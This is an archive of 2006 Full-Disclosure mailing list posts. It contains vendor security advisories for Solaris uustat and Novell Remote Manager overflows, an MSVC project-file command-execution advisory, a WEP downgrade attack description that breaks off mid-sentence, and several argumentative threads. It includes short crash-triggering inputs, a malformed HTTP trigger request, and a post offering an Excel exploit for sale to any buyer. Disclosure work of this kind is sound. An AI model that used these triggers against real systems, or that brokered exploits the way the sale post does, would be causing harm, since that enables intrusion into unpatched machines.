Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.10.06: Sun Solaris uustat Buffer Overflow Vulnerability


Sun Solaris uustat Buffer Overflow Vulnerability

iDefense Security Advisory 01.10.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=366
January 10, 2006

I. BACKGROUND

The uustat binary (part of the uucp project) is used to display or
cancel uucp requests as well as to provide general status on uucp
connections to other systems.

II. DESCRIPTION

There exists a buffer overflow venerability in the /usr/bin/uustat
binary in Sun Solaris 5.8 and 5.9.

The uustat binary is installed setuid "uucp" by default on Solaris. The
"-S" command line argument causes the binary to crash when followed
with a string that is greater than or equal to 1152 bytes in length.

The following shows the buffer being overflowed and then the o1
register being completely overwritten with the letter 'A':

bash-2.03% ls -l /usr/bin/uustat
---s--x--x   1 uucp uucp62012 Jan 17 16:07 uustat

bash-2.03$ /usr/bin/uustat -S `perl -e 'print "A"x3000'`
Segmentation Fault
bash-2.03$
(gdb) info registers
g0 0x0  0
g1 0xff315e98   -13541736
g2 0x1cc00  117760
g3 0x4401088
g4 0x0  0
g5 0x0  0
g6 0x0  0
g7 0x0  0
o0 0xff3276a8   -13470040
o1 0x41414141   1094795585
...

III. ANALYSIS

By exploiting this buffer overflow, an attacker can potentially gain
control of the return address of the executing function, allowing
arbitrary code execution with "uucp" privileges.

IV. DETECTION

Solaris 8 and 9 are running on SPARC and x86 architectures are
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

 http://sunsolve.sun.com/search/document.do?assetkey=1-26-101933-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0780 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/11/2004   Initial vendor contact
08/11/2004   Initial vendor response
01/10/2006   Coordinated public disclosure

IX. CREDIT

Angelo Rosiello (http://www.rosiello.org) is credited with discovering
this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I have got many questions about the severity of the bug , you can show
a demo yourself here:

http://heapoverflow.com/excelol/excel_like_hell.swf

ms will fixe this issue soon I'm sure, for me , job done, bye :>

[EMAIL PROTECTED] wrote:
> after many hours working on excel I have found a critical excel bug
> exploitable. This is not a stack bof nor a heap bof , a bug
> extremely hard to find and trigger , but it conduct excel to
> execute any arbitrary codes while opening a malicious .xls file.
>
> note: the bug isn't related to both excel dos that I have already
> published but shows similiar to a null pointer bug at a first look.
>  much infos won't be disclosed publicly or privately and this will
> be transmitted to ms before the spyware loosers catch it :)
>
>>> I have said so this is only null pointer bugs but the way I
>>> trigger the bug might be modded for a remote code execution who
>>> know , I'm not a guru and maybe did an error triggering the
>>> flaw who knows :) but I bet many are already reasearching on
>>> this hehe, happy job!
>
>
>
>>> Let's go on the fast publishing :) I wont bother to message
>>> microsoft about this because they wont patch it for sure
>>> according that they can't patch fully exploitable bugs in a
>>> decent time, they do not patch IE dos
>>> (http://heapoverflow.com/IEcrash.htm), so no way to bother
>>> them, we should let them sleep a bit shhh ;)
>>>
>>> Bugs 1 and Bugs 2 are quite similiar but NOT, both are null
>>> pointer bugs . In bug1 you should mod a grafic's pointer to
>>> point to a bad area, and in bug 2 you should null out the size
>>> of the page name.
>>>
>>>
>>> attached are the 2 pocs, nor here are direct links
>>>
>>>
>>> http://heapoverflow.com/excelol/bug1.xls
>>> <http://heapoverflow.com/excelol/bug1.xls>
>>> http://heapoverflow.com/excelol/bug2.xls
>>> <http://heapoverflow.com/excelol/bug2.xls>
>>>
>>>
>>>
>>> Credits:
>>>
>>> AD [at] heapoverflow.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8PL5a+LRXunxpxfAQIHNw/9H6aug9gm0orJmZGIEQ7vGSdDwZkOCLMO
Dw7pt6fzDFUKM3HeL3oR2gbQaPUZL57iuuY8NCKEoU3y5hiFm64nlWyGARu3ITW3
cuBVUWNpqvZzZbBU4mj9Rc5pG23Y8WrfsNRBAaJWJGjOTHacDsmn5sD0rIdwDXIP
pb7pDztp6C4yPkWKN+n/Y5I73M1a8ZI+34VvOSqyMM8eGGTbcnnzF4Uz/f/rhZm9
Mm6NBgdQhSOHNqPYz5RjQtrC8O9e8/C3Zekj/YKr1jB3HOa0jiBLDALG7VIQwK/b
49e+nUK3FxQ49ygoWSvVwP0+7cFOdOVZ8Ahfd0EVCnyAkxJ04Qa+L9rF0FGSO+M6
ljg0ma93De14rHj1O+mQvRpotuUGSWJsfeBSPVLAuODZBmcp7N+AE3E2vKUwGjr5
k+FJWHs2fRxCkXb55mic+1aFdWxZvnXDmpJt1t+QTcWDl4OL6/+Ovu/fPWzg2vcQ
i25RqdbsfKUnW2/QuoSrPzmgIc8s9UjIwFOj25eR0kUYMwjaugoGaYRMH0NdsSAK
MwQJuVGtI4FaKLzYrPQ6m/dOyIqdH0s9cUyXrpNUWByVgMtO+pBSHp9gyCj9lVGs
PfHEqYFQX2/xwJQ9QLJz+rCtATzcEjWkN2b79GOm622laRfFI0te/QJa/4BJLncp
LGgvT0HVO0k=
=smBn
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ntpd stack evasion exploit

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
this is s lol , nice lookup Przemyslaw

Przemyslaw Frasunek wrote:
> !bSt bitwarz Security Team napisał(a):
>> /* ntpd remote root no-exec stack evasion spl0it * by m0sk0v
>
> well... stolen code from my exploit (and advisory) published almost
> five years ago on bugtraq. only comments and printfs where changed.
>
>
> http://marc.theaimsgroup.com/?l=bugtraq&m=98642418618512&w=2
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8Q1/6+LRXunxpxfAQJS8w//RYiT1Z69YY2xruixzpjtc1GOD10YAcgH
lO2+LAy3K/TtxnjuryHjiY83epo7HtUSvFp2iRGUaNqdGCnND6wLPZ7QYDuy8pX9
iwdqMch3P2qOscJ94PqF/jyFtVz0zx+3d9uER1L+uKZWa/QKTxEHDcvXRoCBPk4x
cuc8hsjg/GteG/Ti28Ot6mMCae7FZGi6luHjFISI+Mww5Ps1QdGO2s7rK2OozuyL
Sx6syB6r4cAvtGT/uIjirG+4eC+DwAKJbGAY5Kv6k5TqXeN6QSJes5oD5Jy9r/LV
/irxGYHIiV2Rrap4ajEm3SCzRIv3yimpiGAbCN20ifNmpNlMwNI4UnwUGX+HOQDs
WS4hbPfUYYOvqWTSioOimeaFlH6anw+7JPc9hn+OhRCsN+GrG1ielJMlFnnx+yxh
L7WgyhRgtFTb1AG95gQBo1kOMYyCPRrxI/3+xPSAMzKaPKyUEOPEQkL1o4xTnvvp
6mJfY/KvzDcjChzzAtvPGuV0ITbtrcbf/cOP2S3LuNsJoOLJA9cCuXqfSUq+tgPG
kQ5XuQDt63SaDj/gtoj6lbrswprwGp7pWyw6Ezfakq8XlABuWXj+uN+0q2QSBIpN
Zz7ccKBkaxEe1+J2H2e02GAC3tHxOxSzCHoQRoDBDePyQqlF9Uo5jPxN725V5NCM
UWXxBYp4RG4=
=UyN2
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Critical excel vulnerability for sale, read inside.

2006-01-11 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
It has not been possible for me to reach an agreement with zdi nor
idefense for selling the excel bug because I have publicly warned
about a remote command execution in my forum, I have tried to excuse
me about my selfstarting mistakes in the rssponsible disclosure nor to
explain them then if I find a 2nd excel critical bug , how can I
submit it to them since I have publicly warned about an excel flaw ?
You should reject actually any excel flaw no ?
No that's it , they leave me alone with a critical excel flaw, so I
have no other way now to get paid for my research to leave an announce:

A critical excel flaw is for sale, if you wish to buy it what do you
will have:


- -full advisory (explaining how I have found it , how I exploit it)
- -full poc building a xls file, once this file opened , excel will
arbitrary run regedit.exe, a bindshellcode, or add an admin user.
- -you have all rights on it , since Im alone able to exploit it, you
will trust me, I never share privately, you will be the only owner of it.

if you wish to see what the bug does, I can compute some videos on
demand. And of course if you are willing to buy it , do not offer
something ridiculous.


for any informations , [EMAIL PROTECTED]


note: I know this look like a joke, but I'm serious , I should be paid
for my security research , and I really dont want to help microsoft
for free, the auction is up for whitehats and blackhats, thanks to the
resposible programs on this.
I know I have made a mistake but this was still up to you to stop me.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8WG5q+LRXunxpxfAQJj3g//bc7pkBjMyBH8tey3XT6FaCIOI4toxdeZ
xeIBVjafFHddvwUIARDEO/FIy3RGNZbfY4O3y+NC+CyhJVc+HcMFplns9AYCutNk
P7WcQ+Ax8KJth4Bo2ol2B53gdLZ6rnSWyp8Xua2GWc9Z9d6rbfrQHZaY9s53j8XP
ITmo4Yoly1A8NnD3m1ZDRN2TrDsaBZQbd97vfi20oHUH41VAN9b/lU3UI9+QC8oo
TZVDVvYi4YTnNEUfWW5CQlJ9+kDxRPfRMhOVMo/oSXgbD/56s5vRHB7eMxakLWBb
jwrdTQ/5S7ez20sK3UIZmV3919TPVHQK0NF4OX8ZpLsHPrguDUUZXXePzMcnnibl
MHGkBVIegCojHyQth8WiHo0adCAoOcuIdFXmaXXFmg3NSstsv6AFQ64fJO7vOJYs
HJ0X5BKHHTPdIElT9Uzbif5UfdARCIOhgcF/e2hXpHX7PJYXahZTUtOYLmfQbIeT
QMRJL8wH1lIAhBJiIWo+ZUJ6YgnovS8YBsffYjtRUVe7e0v+oZsuAp6c4A0XWP7O
rywj7aXT8xsz5mkHGuN9W9EiKq7XgO0d3EGyp0XZcm03CuAriCwLN/exx1bJkcw/
gCsebwGTSHbyzVDyioqjfdNskQwIakmFZvlPGC3+9Rv1aiYogH8CpBOIJgvBvkCW
kmCQMX9ui1Y=
=khwl
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-12 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I was joking you know , this hole is a fake but shhh ;)

Amit Sharma wrote:
> ad, don't you think it would be a good idea if you either post your
> PoC with complete details otherwise do not post it. I mean from the
> "excel_like_hell.swf" demo, I do not see anything that one would
> infer.
>
> I can see that a xls file is created and on opening it (as per the
> demo), it makes a registry entry. Now how true is this? If you are
> posting no more info here they how is it going to help us otherwise
> what was the intent of the post?
>
> - Amit
>
>
> */"[EMAIL PROTECTED]" <[EMAIL PROTECTED]>/* wrote:
>
> I have got many questions about the severity of the bug , you can
> show a demo yourself here:
>
> http://heapoverflow.com/excelol/excel_like_hell.swf
>
> ms will fixe this issue soon I'm sure, for me , job done, bye :>
>
> [EMAIL PROTECTED] wrote:
>> after many hours working on excel I have found a critical excel
>> bug exploitable. This is not a stack bof nor a heap bof , a bug
>> extremely hard to find and trigger , but it conduct excel to
>> execute any arbitrary codes while opening a malicious .xls file.
>
>> note: the bug isn't related to both excel dos that I have already
>>  published but shows similiar to a null pointer bug at a first
>> look. much infos won't be disclosed publicly or privately and
>> this will be transmitted to ms before the spyware loosers catch
>> it :)
>
>>>> I have said so this is only null pointer bugs but the way I
>>>> trigger the bug might be modded for a remote code execution
>>>> who know , I'm not a guru and maybe did an error triggering
>>>> the flaw who knows :) but I bet many are already reasearching
>>>> on this hehe, happy job!
>
>
>
>>>> Let's go on the fast publishing :) I wont bother to message
>>>> microsoft about this because they wont patch it for sure
>>>> according that they can't patch fully exploitable bugs in a
>>>> decent time, they do not patch IE dos
>>>> (http://heapoverflow.com/IEcrash.htm), so no way to bother
>>>> them, we should let them sleep a bit shhh ;)
>>>>
>>>> Bugs 1 and Bugs 2 are quite similiar but NOT, both are null
>>>> pointer bugs . In bug1 you should mod a grafic's pointer to
>>>> point to a bad area, and in bug 2 you should null out the
>>>> size of the page name.
>>>>
>>>>
>>>> attached are the 2 pocs, nor here are direct links
>>>>
>>>>
>>>> http://heapoverflow.com/excelol/bug1.xls
>>>>
>>>> http://heapoverflow.com/excelol/bug2.xls
>>>>
>>>>
>>>>
>>>>
>>>> Credits:
>>>>
>>>> AD [at] heapoverflow.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


> Send instant messages to your online friends
> http://in.messenger.yahoo.com


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8bXoq+LRXunxpxfAQKUDxAA6TuBrXW1X9UFWcEcqm5nIkknfk0SHZVd
oqEerf4f1xXuvmQOauMnkBMM5p8nxpAVMN2/0yYeyHOpuO9Xv+ZKzsz4rn4XBB78
0nIITxy4w57U/tj7qXI7whG+798MMgse5iNFWzEmJltSlo8Wi8RTSKSEfOz06Cei
vNCIOYUF3lZG8xrwygbqJgapVKwXX0A9U9A0xwvfykpLLwQCLOZsYp3bQi8C9R4M
EhdrOXTlz10J5i4wusYAbBoOW08FbJn1OQLOp3HhUoYXZlgq/n8IBvatwxNceTVo
1gU97IYdSHpRpGkgjLas0RSHEB+L3KbSkTL/JqbuIr2cF7Dxz/sUbvZLOWBtIn6x
sc6/g1a0xWq3jG0LtfotGGmtUfJ+KSumlxm0YR3NtVoOCbqXdbfxMgiHDmxF8Aag
SfELl40jeIboPqrGoblaMhz7OWquVVfFjmfkIuyiwzUuNBSP9QcvarkMWdTZavbQ
JcBunpP3Hw4aE3zNp7i3aHPTGoBNaEcu6Fgfvaa9CA7pmUaehgoYW4QBdGa6j0JW
4CtGFhFSFrMddgtDWKoEU/vlzkvbl8QaaYwjXby6VU+kMoKthW1btD0SU4ue7uM5
Ke3HSh1ZrXhch4GqbaQKPV0/XlaRy8/GUQ3JulbKaHqMp834FhOMrEekXxsQH1VW
pk71ohqJHbM=
=g+EB
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.13.06: Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

2006-01-13 Thread [EMAIL PROTECTED]

Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

iDefense Security Advisory 01.13.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 13, 2006

I. BACKGROUND

Novell SUSE Linux Enterprise Server is a platform for open source
computing in an enterprise environment.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
Open Enterprise Server Remote Manager allows attackers to execute
arbitrary code.

III. ANALYSIS

The vulnerability specifically exists due to improper handling of a an
HTTP POST request with a negative Content-Length paramater. When such a
request is received, controllable heap corruption occurs which can lead
to the execution of arbitrary code using traditional Linux heap overflow
methods. The following HTTP request can be used to trigger this
vulnerability.

POST / HTTP/1.0
Content-Length: -900

DATA_THAT_WILL_BE_USED_TO_OVERWRITE_THE_HEAP

iDefense Labs testing has determined that with careful manipulation of
the string, an arbitrary 4 byte write may be achieved which can be used
to gain execution control.

IV. DETECTION

iDefense has confirmed this vulnerability in Novell SUSE Linux
Enterprise Server 9. All previous versions are suspected vulnerable.
Novell SUSE Linux Enterprise Server components are included in Novell
Open Enterprise Server; as such, Open Enterprise Server is also
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Novell has released the following advisories to address this issue:

http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html

http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html

SUSE has released the following advisories to address this issue:

http://www.novell.com/linux/security/advisories/2006_02_novellnrm.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3655 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/15/2005 Initial vendor response
01/13/2006 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WEP-Client-Communication-Dumbdown (WCCD) Vulnerability (re-send)

2006-01-16 Thread [EMAIL PROTECTED]

sorry, earlier email seems to have not gotten through

--- Forwarded message follows ---
To: full-disclosure@lists.grok.org.uk
Subject:WEP-Client-Communication-Dumbdown (WCCD) Vulnerability
Date sent:  Mon, 16 Jan 2006 17:23:09 +0800

ThinkSECURE Pte Ltd  (www.securitystartshere.net) has released 
details of a client-side wireless vulnerability which affects 
wireless users who are still using WEP.  

More details including mitigation actions are available at our 
website at:
http://www.securitystartshere.net/page-vulns-wccd.htm

### Vulnerability Name ###
WEP-Client-Communication-Dumbdown (WCCD) Vulnerability

### Vulnerability Description ### 
ThinkSECURE has discovered that certain well-known wireless chipsets, 
using vulnerable drivers under the Windows XP operating system and  
when configured to use WEP with Open Authentication, can be tricked 
by a 802.11-based wireless client adapter operating in master mode 
("the attacker") to discard the WEP settings and negotiate a post-
association conection with the attacker in the clear.  

We have named this vulnerability as the "WEP-client-communication-
dumbdown" (wccd) vulnerability.

This vulnerability is apparently not due to Windows itself but due to 
the operation of the drivers for the affected wireless cards.   
However, this does not discount a situation where a patch could be 
released by Microsoft to deal with the problem on the chipset makers' 
behalf.  
Again, this is apparently NOT a Windows problem but a wireless 
chipset driver-related one.

End-users of the system would not notice any difference about the 
clear connection that was being established.  
Although WPA/2 & WPA-PSK have been out for some time now, in our  
experience there is still a large installed client base who are still 
using WEP-enabled Access Points and thus have WEP-enabled profiles 
setup in their laptops.  This installed base is vulnerable.

### Vulnerability Impact ###
The vulnerability was observed in a Windows XP wireless client 
configuration with the vulnerable drivers and with the following 
setups: 
1. Profile configured using Windows XP zero configuration as well as 
using the vulnerable drivers' bundled wireless client managers;
2. Profile configured to use WEP with static WEP key & Open 
Authentication.

Using ThinkSECURE's recently-released security auditor's tool -  
probemapper - one can remotely evaluate the SSID and capabilities of 
wireless profiles from probe requests and assess whether the subject 
is probing for any Open-Authentication-WEP-encryption-enabled 
wireless networks.

When a Windows XP client using a vulnerable chipset driver is 
configured as outlined above via their wireless profiles ("the 
victim"), the victim will send out probe requests bearing the SSID 
configured in the wireless profile.  

An attacker who detects the probe request frames coming from the 
configured profile can configure a master-mode-enabled wireless card 
with the detected SSID of the probe request frames and, using Open 
Authentication with no-encryption, send probe responses to the 
victim.   

The victim will then initiate authentication and association, sending 
an association request frame with the Privacy Bit set to 1 (AP/STA 
can support WEP).  

The attacker returns an association response frame with Privacy Bit 
set to 0 (AP/STA cannot support WEP).

Although the correct behavior should be to not establish any 
communication due to the difference between association request and 
response Privacy Bits, the victim "dumbs-down" and establishes an un-
encrypted communications session to match the attacker's Privacy Bit 
setting of 0, thus ignoring the WEP settings as configured in the 
client's profile. All traffic to & from this connection will be sent 
in the clear.

A victim who has a vulnerable wireless network at home and brings a 
laptop bearing the profile of said home wireless network to his/her 
organization and plugs in using a wired connection may be attacked in 
this manner and used as a conduit by the attacker, through the 
bridging of the laptop's wireless interface to the wired interface, 
to the victim's organization's wired network, thus bypassing 
corporate perimeter defences. It is irrelevant that the organization 
does not use wireless or has a no-wireless policy if that policy is 
not strictly enforced through proactive checking.

Also, firewalling on the victim's laptop might not guarantee safety 
in certain cases: e.g. the attacker issues an IP address and gateway 
address to the victim in response to the victim's typical DHCP 
request upon association so as to fool the victim's machine into 
forwarding all traffic to the attacker's machine. The result is that, 
when the victim opens up a web browser for example, he will see a 
crafted page bearing malicious code on the attacker's machine which 
runs exploit code on the victim's machine (a good example being the 
recent

Re: [Full-disclosure] Secure Delete for Windows

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
it's against the charter true but it's tolerated because you arent the
first to promote your tool and you won't be the last, idefense,
immunity , cirt.dk , they promote all their works and I wish they will
continue, just ignore the bad comments about this , or at least if it
was comments from an useful person,  but in this case, GTi has nothing
to say on this list.

sk wrote:
> thank you for the constructive feedback. at least it was usefull
> and not just some random flame. i do appriciate your comment, i
> dont agree with some points though. it may be the default business
> strategy, but if a single person (or a handfull) think they have to
> complain that i announce a security application here, i do argue
> about it. then again, i should better ignore such random bullshit
> as there will be always some smart ass who thinks he has to post a
> negative and senseless comment.
>
>> I guess you only consider orders useful.  I wonder how you
>> respond to complaints about bugs?
>
> i'd appriciate it as then we can make the software more stable.
> thats only good.
>
>> Remember! Swearing at your customers shows them who's boss!
> done with sarcasm ?
>
>> ** this is not an endorsement or support of any community
>> members, but rather an observation that it is typical business
>> practice to treat even the most annoying potential customer with
>> respect.
>
> i know that those arent even potential customers so thats why. a
> real customer, of course, will receive a friendly response.
>
> - Original Message - From: "Yvan Boily" <[EMAIL PROTECTED]>
> To: "GroundZero Security" <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]>;
>  Sent: Tuesday, January 17, 2006
> 9:09 PM Subject: Re: [Full-disclosure] Secure Delete for Windows
>
>
>> Now for the lesson on business communication:
>>
>> 1. Dealing with open source proponents:
>>> also not everyone posts their source so what is your fucking
>>> problem?!
>> 2. Elliciting positive feedback:
>>> my god if you dont have anything usefull to say, then why dont
>>> you stfu.
>> 3. Commenting on community members**:
>>> it seems suddenly after this n3td0rk shit, everyone starts his
>>> own little flame wars over nothing
>> Remember! Swearing at your customers shows them who's boss!
>>
>> ---
>>
>> I guess you only consider orders useful.  I wonder how you
>> respond to complaints about bugs?
>>
>> Just a note; if you are going to market your product to people
>> try to avoid making a negative impression!  And certainly, reply
>> to people individually as you will, but if you are going to blast
>> someone then do it privately.  I know this is not really my
>> nature, but then again, I am not marketing products!
>>
>> ** this is not an endorsement or support of any community
>> members, but rather an observation that it is typical business
>> practice to treat even the most annoying potential customer with
>> respect.
>>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ81tfK+LRXunxpxfAQJ4KBAA4ndDGYC4f0L81XXFuH0uEajmvnmbwXku
dvI6S1U9PzGNvrqHyh6OLruJidv7WfMbtFardfjL0/apzD+AMDT0gDAW6Wnc9Vik
nKTuIRy2t3M/WSutHeoSuzPNQIwHFkhCPqiG3//YgjycTFRdcj1bFnlEkkXq19+K
wzfTO5SheprKflVUzKm3cB2iwyC2BJ0BOWUUw2IsEJKdPR0RstkJTKlnjAzitUyQ
eekz+2BE22UKx1BPPHi1v7c78Xhl8i/tXxfLxdhrS10gXM4JOnu2eWRVhKiuPw4m
O/opNcpvBPfN0cNOuDQ/PoYFZjvdOBpH/k55zhiebIHPafQ+ViWfrCyiLsUzz0yp
mumYc9TF9ZvzOojNbjQzdKGe1MGY/3cDi6iDsVLLnJY2lAOuRkPhEuZ34+s0jygY
P60Nb189p0p3Tk+fadCGQOgZqypfzx8Du34aFTQIYP7V2LhYTKIuZZ7MnEyVJvXB
Z5Pivr9VD7DUaKR0U8r/19YJqhe83ZpwONtbVqaKrjl0LCm1i57lQTdWhYV6N2Sj
dxVr+DpTrN6OFPHT8zfy8Vb0ZdZgWJmfQTtg5eze+lr7oLFFqBMaqEfgG2R5Pj/t
AsymXYSeTUcSWXToCCRy23uH69qq+MxWF5C5M3kfWsPMpV1odgxPSgkGrZP+n9f3
P+WQNCaShnA=
=qH8x
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Bug in MSVC

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I think ms wont fixe any bug in vstudio, I have told them if they will
fix the vs2005 issue published recently and they said me exactly what
is on your support page:

"Only open project files that come from trusted sources."


or "Only open WMF files that come from trusted sources." would have
been less effort than releasing a patch then lol :D


Morning Wood wrote:
>  -
> EXPL-A-2006-002 exploitlabs.com Advisory 048 -
> 
>
> - MSVC 6.0 run file bug -
>
>
>
>
> AFFECTED PRODUCTS = Microsoft Visual Studio 6.0
> http://microsoft.com
>
> Possibly other products referenced in:
> http://support.microsoft.com/kb/841189
>
>
>
> OVERVIEW  Source code project distributions are very
> popular these days. Generally authors offer code as a project with
> source, headers, and msvc project files if it is a fairly big
> project. Most users will simply open up the project.dsw file, (
> especialy if it says to do so in a readme.txt or other compiler
> instructions ) which in turn loads the project.dsp files, which
> provides the compiler directives. A malicious attacker could embed
> commands to be executed in the project files, and execute any local
> code of his choosing.
>
> note: this is an implemented feature in MSVC, and should be
> considered a bug, not a vulnerability.
>
>
>
> IMPACT == The impact of this is quite severe, as it is possible
> to script commands such as to launch ftp, retrieve and execute a
> file from a remote location.
>
>
>
>
> DETAILS === By modifying the .dsp files:
>
> project settings custom build Commands: command to execute
> Post-build Step: command to execute
>
>
> 1.a  InputPath=.\Release\hello.exe SOURCE="$(InputPath)"
>
> "hello.exe" : $(SOURCE) "$(INTDIR)" "$(OUTDIR)" calc
>
> 1.b  PostBuild_Cmds=notepad.exe
>
>
>
> POC 
> http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip
>
> extract, and open hello.dsw click "batch build, build" or "rebuild
> all" code will execute ( calc.exe and notepad.exe used as an
> example ) calc.exe = Custom-Build notepad.exe = PostBuild Commands
>
>
>
> SOLUTION  vendor contact: [EMAIL PROTECTED] Sept 20,
> 2005 http://support.microsoft.com/kb/841189 updated Jan 6, 2006
>
> Microsoft provided these URL's as well:
> http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp
>  http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx
>
>
>
>
> SUGGESTED PATCH === Include a dialog box that warns the
> user, before pre and post build directives can be launched, if the
> presence of execute directives exist in the build project files.
>
>
>
>
> CREDITS === This vulnerability was discovered and researched by
>  Donnie Werner of exploitlabs
>
>
> mail:   wood at exploitlabs.com mail:   morning_wood at zone-h.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ81w6K+LRXunxpxfAQKhqw/+PP3xy1cT5WmiEcFQ2QuU4eoFRbgw9ZnA
iFDvGqpZXblQuosDIx3jripRKDeshhJc00GbeMT3I9Fw1XrRbVPFETLV7IpitmPQ
jhOKo3pRxDp+mxpFOZpc9mDEhLb873j9un309Ahor29hLgnZ5b5O9J6YuWaFXkZN
FS9tBvVbypb5rqIPe5GpZzNO88tfqwC/xk9JG3qgpuAtgLM/hh7Dp8fpptKdylTA
LfK5OrH5HZ44uJmXxNbDfr8/XJk2Mv9SLC2UitT6DMk/02XfDAR7r2Dj1MnC6Toc
SV3Vv9w9tRHkc1/iKV7/cZyrd8fEi8ZJhgn8DgAeLM3OYTW1I+BpOnAiR58F9+KO
Zqj2QrY92sJTpXSIq2jswslMguAjkZF5jtmXYjzYSPx8w5xfNkjbLRHZ5vX6iZJC
yJXH7nod6OHyCdyLlQIdOsECEorj/bZ5OAlKlgOZrD79cOLCxkOKgrMaxmHIm/Jf
3t/elL4gVS/fvasSsn2Xdm44lzXCbxo/yDfK2wdIb/1tav5Ls9IHs/nO5t1uC5Pc
zx9YfGRjQeU7fTdnR9In7hVMzj36tgmmaiH7d1zPZU/7iFEczVxbtyVznN3uYrgB
1dLgRRA7LXtzzLpLKLIqsaf7cx9OiUpR4ajgWufPW6c8rOYq+uM3OJ1iHRzo1fD+
m929rPMgoP4=
=wrHF
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

